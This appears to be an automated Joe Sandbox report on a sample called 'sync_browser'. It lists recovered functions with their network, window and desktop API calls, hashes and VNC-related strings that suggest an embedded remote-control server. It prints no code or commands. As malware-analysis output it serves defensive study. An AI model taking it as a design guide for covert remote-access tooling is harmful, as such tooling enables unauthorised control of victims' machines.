Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: ErrorLast
String ID: vncclient.cpp : A connection using DSM already exist - client rejected to avoid crash $vncclient.cpp : DSMPlugin Pointer to socket OK$vncclient.cpp : Invalid DSMPlugin Pointer$vncclient.cpp : failed to set socket timeout(%d)
API String ID: 1452528299-2001727811
Opcode ID: 4d081dc491a9ac6cbd13230380636544dfc8f183765b0f0986b9e0b49d768617
Instruction ID: aa44ce3af3cfd1a30fa6420d63f1ab0b698e7ed19bdce11dbadc51e5c541b03d
Opcode Fuzzy Hash: 4d081dc491a9ac6cbd13230380636544dfc8f183765b0f0986b9e0b49d768617
Instruction Fuzzy Hash: 4841E966A05A8582EB55AF26C0887BC67A0FB84F88FC89472CE0D473A4DF3DD585C361

Function 00007FF7D59588A0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 68COMMON

Download Yara Rule

APIs

getpeername.WS2_32 ref: 00007FF7D59588F0
inet_ntoa.WS2_32 ref: 00007FF7D59588FA

Part of subcall function 00007FF7D59E92A4: malloc.LIBCMT ref: 00007FF7D59E92C7

Part of subcall function 00007FF7D59E7978: malloc.LIBCMT ref: 00007FF7D59E7992

InitializeCriticalSection.KERNEL32 ref: 00007FF7D595894B

Part of subcall function 00007FF7D59C79A0: EnterCriticalSection.KERNEL32 ref: 00007FF7D59C79C7
Part of subcall function 00007FF7D59C79A0: LeaveCriticalSection.KERNEL32 ref: 00007FF7D59C79E9
Part of subcall function 00007FF7D59C79A0: CreateSemaphoreA.KERNEL32 ref: 00007FF7D59C7A03
Part of subcall function 00007FF7D59C79A0: GetLastError.KERNEL32 ref: 00007FF7D59C7A15

Strings

<unavailable>, xrefs: 00007FF7D5958900

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: CriticalSection$malloc$CreateEnterErrorInitializeLastLeaveSemaphoregetpeernameinet_ntoa
String ID: <unavailable>
API String ID: 4131039871-1096956887
Opcode ID: 662e7cd3472f8606c1dbc32a9fae7d2c30d9cf2075c004d535a59fbb274039f5
Instruction ID: 228879e2f94b706de2430e5ef6ea27564c2972f57a8e0512f6df3e32d6efe135
Opcode Fuzzy Hash: 662e7cd3472f8606c1dbc32a9fae7d2c30d9cf2075c004d535a59fbb274039f5
Instruction Fuzzy Hash: 13318932608B8183EB54AF24E8543ADB3A4FB88B98F940136EE9D477A4EF3CD455C750

Function 00007FF7D599CD40 Relevance: 6.1, APIs: 4, Instructions: 52networkCOMMON

Download Yara Rule

APIs

inet_addr.WS2_32 ref: 00007FF7D599CD7A
gethostbyname.WS2_32 ref: 00007FF7D599CD8C
htons.WS2_32 ref: 00007FF7D599CDB1
connect.WS2_32 ref: 00007FF7D599CDCB

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: connectgethostbynamehtonsinet_addr
String ID:
API String ID: 599670773-0
Opcode ID: d38f48bb9340a20dfa4c775536a6897ee0645aa6d2a7bb91f90b264e8001bf38
Instruction ID: 0af1d8a33f7e5ee0069397af49a38b727ce5415d878897b80ff0017fd5fa6f28
Opcode Fuzzy Hash: d38f48bb9340a20dfa4c775536a6897ee0645aa6d2a7bb91f90b264e8001bf38
Instruction Fuzzy Hash: 5F118422A18A4186EB64AB25E84163DB7A4FFC8F99FC05136ED4E47794DF3CD401CB24

Function 00007FF7D59E7978 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 39COMMON

Download Yara Rule

APIs

_callnewh.LIBCMT ref: 00007FF7D59E7986
malloc.LIBCMT ref: 00007FF7D59E7992

Part of subcall function 00007FF7D59E8C34: _FF_MSGBANNER.LIBCMT ref: 00007FF7D59E8C64
Part of subcall function 00007FF7D59E8C34: HeapAlloc.KERNEL32(?,?,00000000,00007FF7D59F329C,?,?,?,00007FF7D59F7749,?,?,?,00007FF7D59F77F3), ref: 00007FF7D59E8C89
Part of subcall function 00007FF7D59E8C34: _callnewh.LIBCMT ref: 00007FF7D59E8CA2
Part of subcall function 00007FF7D59E8C34: _errno.LIBCMT ref: 00007FF7D59E8CAD
Part of subcall function 00007FF7D59E8C34: _errno.LIBCMT ref: 00007FF7D59E8CB8

Strings

bad allocation, xrefs: 00007FF7D59E79CF

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: _callnewh_errno$AllocHeapmalloc
String ID: bad allocation
API String ID: 3727741168-2104205924
Opcode ID: 921c28abbcbf2c5a57674bbbd0c3a74825746961c44d3ad5b5d496d2e089f50c
Instruction ID: 15700d6dd96a2f11ba9f121f1c79e3dad8009aa867a434ac73a26f4660b48a9c
Opcode Fuzzy Hash: 921c28abbcbf2c5a57674bbbd0c3a74825746961c44d3ad5b5d496d2e089f50c
Instruction Fuzzy Hash: 93013C24A1D79793EA18BB50E8405BCA790BF84B88FC41533ED4D866A6EF3CE145C721

Function 00007FF7D599A290 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37windowCOMMON

Download Yara Rule

APIs

FindWindowA.USER32 ref: 00007FF7D599A2C2
PostMessageA.USER32 ref: 00007FF7D599A2E8

Strings

WinVNC Tray Icon, xrefs: 00007FF7D599A2B9

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: FindMessagePostWindow
String ID: WinVNC Tray Icon
API String ID: 2578315405-1071638575
Opcode ID: b55735387d5fcc8609d7e23d94c71180556838aa6ba5d63fb9eaeb7151e3a813
Instruction ID: 67fbbe2a9f7ece6a64038533b935728c98252dac3ffef2d7799420b08246bf39
Opcode Fuzzy Hash: b55735387d5fcc8609d7e23d94c71180556838aa6ba5d63fb9eaeb7151e3a813
Instruction Fuzzy Hash: 3F018421E2865183EB549B16F44066DA650FF88FD8FC85036EE4E57B59DF3CD8918B10

Function 00007FF7D599CC40 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON

Download Yara Rule

APIs

shutdown.WS2_32 ref: 00007FF7D599CC70
closesocket.WS2_32 ref: 00007FF7D599CC7A

Strings

vsocket.cpp : closing socket, xrefs: 00007FF7D599CC4F

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: closesocketshutdown
String ID: vsocket.cpp : closing socket
API String ID: 572888783-2569437896
Opcode ID: 8dc3be72fa35b56882547eaf8baed56a0b94c43c4fc04f31f3c72a1815f57b02
Instruction ID: 38fac175b99d31a5c786550d66f787607350c845355622e1f432cea85333c341
Opcode Fuzzy Hash: 8dc3be72fa35b56882547eaf8baed56a0b94c43c4fc04f31f3c72a1815f57b02
Instruction Fuzzy Hash: DFF03771A10A5183EB18AF74C8543A97720FF88F19FA04A36CD2E56299DF38C456C3A1

Function 00007FF7D599DD90 Relevance: 4.6, APIs: 3, Instructions: 86networkCOMMON

Download Yara Rule

APIs

select.WS2_32 ref: 00007FF7D599DE1D
__WSAFDIsSet.WS2_32 ref: 00007FF7D599DE5D
send.WS2_32 ref: 00007FF7D599DE78

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: selectsend
String ID:
API String ID: 2999949978-0
Opcode ID: e4fa7076d3caa874285a54a3ee283af3e05e33e5fe15350dd15a6e5305daa52a
Instruction ID: 13add0762b8f4e33140f0eb65055858e88699c3772d26c286d7ca880e50e6de5
Opcode Fuzzy Hash: e4fa7076d3caa874285a54a3ee283af3e05e33e5fe15350dd15a6e5305daa52a
Instruction Fuzzy Hash: 3231F632A1879247EA606B15A8847BEE794BF94F9CFC52036DD4D03A50DF3DD8028A60

Function 00007FF7D59F9234 Relevance: 4.5, APIs: 3, Instructions: 46memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 00007FF7D59F9257
HeapAlloc.KERNEL32(?,?,00000000,00007FF7D59F331F,?,?,?,00007FF7D59F37F7,?,?,?,00007FF7D59EFFD1), ref: 00007FF7D59F928B
_callnewh.LIBCMT ref: 00007FF7D59F92A2

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: AllocHeap_callnewh_errno
String ID:
API String ID: 849339952-0
Opcode ID: 168cf3911275e585727ccf2278bdf0a034da8738718f6c23c6dd903017626324
Instruction ID: 1561f75323a6ce9a53ab7510130a24b36a5a2c57af6d9b4201a45ce42c5bf924
Opcode Fuzzy Hash: 168cf3911275e585727ccf2278bdf0a034da8738718f6c23c6dd903017626324
Instruction Fuzzy Hash: 47115221F0D24287FE556B6596447BCF2D5AF84FA8FC88A32CD1E46AC4DF7CA4448620

Function 00007FF7D5944140 Relevance: 3.0, APIs: 2, Instructions: 44windowCOMMONLIBRARYCODE

Download Yara Rule

APIs

SendMessageA.USER32 ref: 00007FF7D59441C0
FreeLibrary.KERNELBASE(?,?,?,00007FF7D5944124), ref: 00007FF7D59441CF

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: FreeLibraryMessageSend
String ID:
API String ID: 3583424976-0
Opcode ID: 3711d45541c1e93da4d37315846025d5885e52d672c3b20f65361b0611ceea0c
Instruction ID: 358967ed1f486d655ed6132560ccd114786b784a6012fd1a0238f283ff60ceed
Opcode Fuzzy Hash: 3711d45541c1e93da4d37315846025d5885e52d672c3b20f65361b0611ceea0c
Instruction Fuzzy Hash: C9111825B0F58687FE59FBA185A167C9354AFA8F48FC40532DE0E066858F3CE841C326

Function 00007FF7D599CBC0 Relevance: 3.0, APIs: 2, Instructions: 32networkCOMMON

Download Yara Rule

APIs

socket.WS2_32 ref: 00007FF7D599CBE6

Part of subcall function 00007FF7D599CC40: shutdown.WS2_32 ref: 00007FF7D599CC70
Part of subcall function 00007FF7D599CC40: closesocket.WS2_32 ref: 00007FF7D599CC7A

setsockopt.WS2_32 ref: 00007FF7D599CC16

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: closesocketsetsockoptshutdownsocket
String ID:
API String ID: 3513852771-0
Opcode ID: 312866c292d7188c2f9fc1aa8d6132574570804f7b68aec9e7564259e9557771
Instruction ID: 4d89e12bdb3af22166660d567221a0763c0cb272638925e1aeb0e2de889dc714
Opcode Fuzzy Hash: 312866c292d7188c2f9fc1aa8d6132574570804f7b68aec9e7564259e9557771
Instruction Fuzzy Hash: 0FF0C2B2A2821387FB14BF34D8107B9B754AF84B08FD41636DE18862D4DB7DD196CE20

Function 00007FF7D599D170 Relevance: 3.0, APIs: 2, Instructions: 30COMMON

Download Yara Rule

APIs

setsockopt.WS2_32 ref: 00007FF7D599D1AA
setsockopt.WS2_32 ref: 00007FF7D599D1D1

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: setsockopt
String ID:
API String ID: 3981526788-0
Opcode ID: 6674a668f832169722ee7df8d3b9e7f845b9a455c109241ca5fb51d15d315839
Instruction ID: 8c22b16b3732499c7166c3d497f93ac012c71b3ffa03b7cd8cfe00b07070b0bc
Opcode Fuzzy Hash: 6674a668f832169722ee7df8d3b9e7f845b9a455c109241ca5fb51d15d315839
Instruction Fuzzy Hash: 2CF0FC7161419347F7259F74D444679E750FFC4B15F900A32DE9C86AD4CBBCC18A8B10

Function 00007FF7D599D1F0 Relevance: 1.6, APIs: 1, Instructions: 72COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 00007FF7D599D20D

Part of subcall function 00007FF7D599DD90: select.WS2_32 ref: 00007FF7D599DE1D

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: CountTickselect
String ID:
API String ID: 2475007269-0
Opcode ID: 84556e81f7513f2c210acb167795192905406201bcbf957d422c0e9d6dbf8d4c
Instruction ID: 05610aab0c0e3bd28a41baa1c1158a9a785749a2cf8b0906e56760e6f2fec9de
Opcode Fuzzy Hash: 84556e81f7513f2c210acb167795192905406201bcbf957d422c0e9d6dbf8d4c
Instruction Fuzzy Hash: 1A31907260478187EB04EF25E5845EDB762EB88F88F89903ADF094B789DF38D5458B60

Function 00007FF7D59F32EC Relevance: 1.3, APIs: 1, Instructions: 36sleepCOMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00007FF7D59F9234: _errno.LIBCMT ref: 00007FF7D59F9257

Sleep.KERNEL32(?,?,?,00007FF7D59F37F7,?,?,?,00007FF7D59EFFD1,?,?,?,?,00007FF7D59E8C19), ref: 00007FF7D59F3331

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: Sleep_errno
String ID:
API String ID: 1068366078-0
Opcode ID: e0fad309830d1d7079ffb5554beb775af7228a8f16d0edcc9117263fd617f576
Instruction ID: 2b8c694280347533f5535840f8284e79a1ddf5e35409f063f35b9f497a1f16ac
Opcode Fuzzy Hash: e0fad309830d1d7079ffb5554beb775af7228a8f16d0edcc9117263fd617f576
Instruction Fuzzy Hash: 1B016222A24A9586EB58AB17984046DF7A5EBC8FD0BD91172DE5D03B94CF3CE891C700

Non-executed Functions

Function 00007FF7D59381AD Relevance: 463.1, APIs: 192, Strings: 72, Instructions: 1063COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7D593D390: GetModuleFileNameA.KERNEL32 ref: 00007FF7D593D3BB

Part of subcall function 00007FF7D593D480: GetModuleFileNameA.KERNEL32 ref: 00007FF7D593D4AB

Part of subcall function 00007FF7D59E7DE8: _errno.LIBCMT ref: 00007FF7D59E7E00
Part of subcall function 00007FF7D59E7DE8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7D59E7E0C

GetPrivateProfileIntA.KERNEL32 ref: 00007FF7D5938270
wsprintfA.USER32 ref: 00007FF7D5938290
WritePrivateProfileStringA.KERNEL32 ref: 00007FF7D59382B0
GetLastError.KERNEL32 ref: 00007FF7D59382BA

Part of subcall function 00007FF7D593A040: OpenInputDesktop.USER32(?,?,?,00007FF7D59382D7), ref: 00007FF7D593A07A
Part of subcall function 00007FF7D593A040: GetCurrentThreadId.KERNEL32 ref: 00007FF7D593A083
Part of subcall function 00007FF7D593A040: GetThreadDesktop.USER32(?,?,?,00007FF7D59382D7), ref: 00007FF7D593A08B
